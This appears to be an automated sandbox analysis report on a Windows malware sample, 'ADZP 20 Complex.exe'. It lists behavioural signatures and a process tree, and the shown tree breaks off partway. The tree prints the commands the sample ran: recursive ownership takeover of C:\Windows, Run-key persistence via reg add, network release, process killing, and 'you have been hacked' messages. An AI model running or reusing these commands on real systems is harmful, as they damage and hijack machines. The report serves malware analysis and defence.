Analysis
-
max time kernel
121s -
max time network
497s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
06-04-2023 22:47
Static task
static1
Behavioral task
behavioral1
Sample
ADZP 20 Complex.exe
Resource
win7-20230220-en
General
-
Target
ADZP 20 Complex.exe
-
Size
102KB
-
MD5
b64873bc80527aa8e18c0a3b95244f19
-
SHA1
af6c574a2b8fac6a565c551a196ce07e92fd05cc
-
SHA256
30a220aed9f5c0c92a4737a4f32b2ce66eb3d1e8525d0b6879321592b79096ca
-
SHA512
b78165b6edec3abd32ee2bd0465cbc7e30fc14c32db66b65bebb0c1d5a7061cec85172f26a57b97630baa47ee17405560f17da5f37d9f80d141dba5198158f7c
-
SSDEEP
1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf9w2PwpLpNuOh:/7DhdC6kzWypvaQ0FxyNTBf9T8Dv
Malware Config
Signatures
-
Possible privilege escalation attempt 64 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exepid process 8372 takeown.exe 6776 takeown.exe 8876 icacls.exe 6616 icacls.exe 10172 takeown.exe 5956 icacls.exe 10632 takeown.exe 1780 icacls.exe 8572 icacls.exe 8032 icacls.exe 12796 icacls.exe 12196 icacls.exe 12524 icacls.exe 11820 takeown.exe 8668 takeown.exe 3444 takeown.exe 12180 takeown.exe 11776 takeown.exe 5052 icacls.exe 4584 takeown.exe 9316 icacls.exe 4400 takeown.exe 13036 icacls.exe 10748 icacls.exe 8572 takeown.exe 1832 takeown.exe 10000 takeown.exe 6852 takeown.exe 4604 takeown.exe 5776 icacls.exe 1168 takeown.exe 6964 takeown.exe 10248 takeown.exe 224 takeown.exe 5780 icacls.exe 9996 icacls.exe 12896 icacls.exe 10660 takeown.exe 13112 takeown.exe 6320 takeown.exe 8668 takeown.exe 11392 icacls.exe 6960 icacls.exe 1832 icacls.exe 10120 takeown.exe 11444 takeown.exe 12860 takeown.exe 7544 takeown.exe 3472 icacls.exe 12452 icacls.exe 12528 icacls.exe 6592 takeown.exe 3300 takeown.exe 9932 takeown.exe 5732 icacls.exe 11252 icacls.exe 3300 takeown.exe 12832 takeown.exe 1780 icacls.exe 3300 takeown.exe 5776 icacls.exe 12540 takeown.exe 12980 takeown.exe 8820 icacls.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exepid process 9932 takeown.exe 12948 takeown.exe 12796 icacls.exe 11952 takeown.exe 11220 icacls.exe 3300 takeown.exe 548 takeown.exe 6544 takeown.exe 3472 icacls.exe 10632 takeown.exe 6960 icacls.exe 12712 takeown.exe 11252 icacls.exe 1780 icacls.exe 12572 icacls.exe 12676 icacls.exe 12896 icacls.exe 12216 icacls.exe 6356 takeown.exe 12316 takeown.exe 12884 icacls.exe 12952 icacls.exe 8820 icacls.exe 6828 icacls.exe 3188 takeown.exe 12072 takeown.exe 12180 takeown.exe 1160 icacls.exe 12540 takeown.exe 10172 takeown.exe 8124 icacls.exe 3580 icacls.exe 6960 icacls.exe 1160 icacls.exe 9628 takeown.exe 9408 icacls.exe 8032 icacls.exe 6324 takeown.exe 10248 takeown.exe 8544 takeown.exe 11544 takeown.exe 6508 takeown.exe 6712 takeown.exe 5052 icacls.exe 6320 takeown.exe 7436 takeown.exe 5444 takeown.exe 5456 takeown.exe 10896 icacls.exe 12952 icacls.exe 12540 icacls.exe 8572 icacls.exe 2080 icacls.exe 1832 icacls.exe 11392 icacls.exe 12860 takeown.exe 12824 takeown.exe 8424 icacls.exe 3268 takeown.exe 1792 takeown.exe 13216 takeown.exe 13128 takeown.exe 9316 icacls.exe 6508 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops autorun.inf file 1 TTPs 9 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\Autorun.inf cmd.exe -
Drops file in Windows directory 10 IoCs
Processes:
mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exedescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 6960 4204 WerFault.exe dwm.exe -
Gathers network information 2 TTPs 23 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exepid process 5032 ipconfig.exe 6992 ipconfig.exe 5732 ipconfig.exe 1908 ipconfig.exe 4172 ipconfig.exe 6132 ipconfig.exe 5096 ipconfig.exe 6408 ipconfig.exe 4620 ipconfig.exe 6392 ipconfig.exe 6968 ipconfig.exe 5004 ipconfig.exe 1104 ipconfig.exe 1004 ipconfig.exe 9956 ipconfig.exe 7280 ipconfig.exe 1920 ipconfig.exe 7240 ipconfig.exe 12144 ipconfig.exe 2224 ipconfig.exe 7524 ipconfig.exe 5628 ipconfig.exe 8160 ipconfig.exe -
Kills process with taskkill 21 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4756 taskkill.exe 2476 taskkill.exe 9844 taskkill.exe 6520 taskkill.exe 3252 taskkill.exe 6044 taskkill.exe 5920 taskkill.exe 8012 taskkill.exe 9740 taskkill.exe 3904 taskkill.exe 4512 taskkill.exe 8708 taskkill.exe 7180 taskkill.exe 12040 taskkill.exe 6132 taskkill.exe 6908 taskkill.exe 8540 taskkill.exe 7736 taskkill.exe 12556 taskkill.exe 10748 taskkill.exe 3240 taskkill.exe -
Modifies registry class 29 IoCs
Processes:
cmd.execalc.exeWScript.exeexplorer.exeWScript.execmd.execalc.exeexplorer.exetaskkill.execmd.execalc.execmd.execalc.execmd.execalc.exeexplorer.exeexplorer.exetakeown.exeConhost.exeexplorer.execalc.exeWScript.execmd.execmd.execalc.exeexplorer.execmd.execmd.exeWScript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings WScript.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings WScript.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings taskkill.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings takeown.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings Conhost.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings WScript.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings calc.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings WScript.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exepid process 4032 mspaint.exe 4032 mspaint.exe 2068 mspaint.exe 2068 mspaint.exe 5356 mspaint.exe 5356 mspaint.exe 5796 mspaint.exe 5796 mspaint.exe 3672 mspaint.exe 3672 mspaint.exe 5492 mspaint.exe 5492 mspaint.exe 1196 mspaint.exe 1196 mspaint.exe 1456 mspaint.exe 1456 mspaint.exe 4556 mspaint.exe 4556 mspaint.exe 8644 mspaint.exe 8644 mspaint.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
takeown.exetaskkill.exetakeown.exetaskkill.exetakeown.exetaskkill.exetakeown.exetaskkill.exetakeown.exetakeown.exeConhost.exetakeown.exetaskkill.exeWScript.exetakeown.exedescription pid process Token: SeTakeOwnershipPrivilege 224 takeown.exe Token: SeDebugPrivilege 3904 taskkill.exe Token: SeTakeOwnershipPrivilege 4200 takeown.exe Token: SeDebugPrivilege 4756 taskkill.exe Token: SeTakeOwnershipPrivilege 3396 takeown.exe Token: SeDebugPrivilege 2476 taskkill.exe Token: SeTakeOwnershipPrivilege 6932 takeown.exe Token: SeDebugPrivilege 6044 taskkill.exe Token: SeTakeOwnershipPrivilege 6852 takeown.exe Token: SeTakeOwnershipPrivilege 5764 takeown.exe Token: SeDebugPrivilege 6132 Conhost.exe Token: SeTakeOwnershipPrivilege 4584 takeown.exe Token: SeDebugPrivilege 5920 taskkill.exe Token: SeDebugPrivilege 4512 WScript.exe Token: SeTakeOwnershipPrivilege 7436 takeown.exe -
Suspicious use of SetWindowsHookEx 49 IoCs
Processes:
mspaint.exemspaint.exeOpenWith.exeOpenWith.exemspaint.exemspaint.exetakeown.exeOpenWith.exemspaint.exemspaint.exeOpenWith.exetakeown.exemspaint.exemspaint.exeOpenWith.execmd.exemspaint.exemspaint.exeOpenWith.exepid process 4032 mspaint.exe 2068 mspaint.exe 4032 mspaint.exe 4032 mspaint.exe 4032 mspaint.exe 2068 mspaint.exe 2068 mspaint.exe 2068 mspaint.exe 4608 OpenWith.exe 4592 OpenWith.exe 5356 mspaint.exe 5356 mspaint.exe 5356 mspaint.exe 5356 mspaint.exe 5796 mspaint.exe 5796 mspaint.exe 5796 mspaint.exe 5796 mspaint.exe 5456 takeown.exe 5760 OpenWith.exe 3672 mspaint.exe 5492 mspaint.exe 3672 mspaint.exe 3672 mspaint.exe 3672 mspaint.exe 5492 mspaint.exe 5492 mspaint.exe 5492 mspaint.exe 5400 OpenWith.exe 6508 takeown.exe 1196 mspaint.exe 1196 mspaint.exe 1196 mspaint.exe 1196 mspaint.exe 1456 mspaint.exe 1456 mspaint.exe 1456 mspaint.exe 1456 mspaint.exe 4608 OpenWith.exe 5652 cmd.exe 4556 mspaint.exe 4556 mspaint.exe 4556 mspaint.exe 4556 mspaint.exe 8644 mspaint.exe 8644 mspaint.exe 8644 mspaint.exe 8644 mspaint.exe 8280 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ADZP 20 Complex.execmd.execmd.exeADZP 20 Complex.exeADZP 20 Complex.exedescription pid process target process PID 3900 wrote to memory of 636 3900 ADZP 20 Complex.exe cmd.exe PID 3900 wrote to memory of 636 3900 ADZP 20 Complex.exe cmd.exe PID 636 wrote to memory of 1460 636 cmd.exe WScript.exe PID 636 wrote to memory of 1460 636 cmd.exe WScript.exe PID 636 wrote to memory of 3204 636 cmd.exe cmd.exe PID 636 wrote to memory of 3204 636 cmd.exe cmd.exe PID 636 wrote to memory of 3736 636 cmd.exe reg.exe PID 636 wrote to memory of 3736 636 cmd.exe reg.exe PID 636 wrote to memory of 3688 636 cmd.exe reg.exe PID 636 wrote to memory of 3688 636 cmd.exe reg.exe PID 3204 wrote to memory of 224 3204 cmd.exe takeown.exe PID 3204 wrote to memory of 224 3204 cmd.exe takeown.exe PID 636 wrote to memory of 5096 636 cmd.exe ipconfig.exe PID 636 wrote to memory of 5096 636 cmd.exe ipconfig.exe PID 636 wrote to memory of 3904 636 cmd.exe taskkill.exe PID 636 wrote to memory of 3904 636 cmd.exe taskkill.exe PID 636 wrote to memory of 680 636 cmd.exe WScript.exe PID 636 wrote to memory of 680 636 cmd.exe WScript.exe PID 636 wrote to memory of 4516 636 cmd.exe WScript.exe PID 636 wrote to memory of 4516 636 cmd.exe WScript.exe PID 636 wrote to memory of 2688 636 cmd.exe WScript.exe PID 636 wrote to memory of 2688 636 cmd.exe WScript.exe PID 636 wrote to memory of 4952 636 cmd.exe WScript.exe PID 636 wrote to memory of 4952 636 cmd.exe WScript.exe PID 636 wrote to memory of 3060 636 cmd.exe WScript.exe PID 636 wrote to memory of 3060 636 cmd.exe WScript.exe PID 636 wrote to memory of 4108 636 cmd.exe WScript.exe PID 636 wrote to memory of 4108 636 cmd.exe WScript.exe PID 636 wrote to memory of 4624 636 cmd.exe WScript.exe PID 636 wrote to memory of 4624 636 cmd.exe WScript.exe PID 636 wrote to memory of 3536 636 cmd.exe WScript.exe PID 636 wrote to memory of 3536 636 cmd.exe WScript.exe PID 636 wrote to memory of 3936 636 cmd.exe WScript.exe PID 636 wrote to memory of 3936 636 cmd.exe WScript.exe PID 636 wrote to memory of 1364 636 cmd.exe WScript.exe PID 636 wrote to memory of 1364 636 cmd.exe WScript.exe PID 636 wrote to memory of 900 636 cmd.exe msg.exe PID 636 wrote to memory of 900 636 cmd.exe msg.exe PID 636 wrote to memory of 2844 636 cmd.exe msg.exe PID 636 wrote to memory of 2844 636 cmd.exe msg.exe PID 636 wrote to memory of 2032 636 cmd.exe msg.exe PID 636 wrote to memory of 2032 636 cmd.exe msg.exe PID 636 wrote to memory of 2072 636 cmd.exe ADZP 20 Complex.exe PID 636 wrote to memory of 2072 636 cmd.exe ADZP 20 Complex.exe PID 636 wrote to memory of 2072 636 cmd.exe ADZP 20 Complex.exe PID 636 wrote to memory of 4876 636 cmd.exe notepad.exe PID 636 wrote to memory of 4876 636 cmd.exe notepad.exe PID 636 wrote to memory of 4756 636 cmd.exe taskkill.exe PID 636 wrote to memory of 4756 636 cmd.exe taskkill.exe PID 636 wrote to memory of 4944 636 cmd.exe explorer.exe PID 636 wrote to memory of 4944 636 cmd.exe explorer.exe PID 636 wrote to memory of 4032 636 cmd.exe mspaint.exe PID 636 wrote to memory of 4032 636 cmd.exe mspaint.exe PID 2072 wrote to memory of 1804 2072 ADZP 20 Complex.exe cmd.exe PID 2072 wrote to memory of 1804 2072 ADZP 20 Complex.exe cmd.exe PID 636 wrote to memory of 3624 636 cmd.exe ADZP 20 Complex.exe PID 636 wrote to memory of 3624 636 cmd.exe ADZP 20 Complex.exe PID 636 wrote to memory of 3624 636 cmd.exe ADZP 20 Complex.exe PID 636 wrote to memory of 2348 636 cmd.exe notepad.exe PID 636 wrote to memory of 2348 636 cmd.exe notepad.exe PID 3624 wrote to memory of 3572 3624 ADZP 20 Complex.exe cmd.exe PID 3624 wrote to memory of 3572 3624 ADZP 20 Complex.exe cmd.exe PID 636 wrote to memory of 2868 636 cmd.exe calc.exe PID 636 wrote to memory of 2868 636 cmd.exe calc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AC33.tmp\AC34.tmp\AC35.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""2⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r4⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB27.tmp\BB28.tmp\BB29.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2ED0.tmp\2ED1.tmp\2ED2.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release7⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
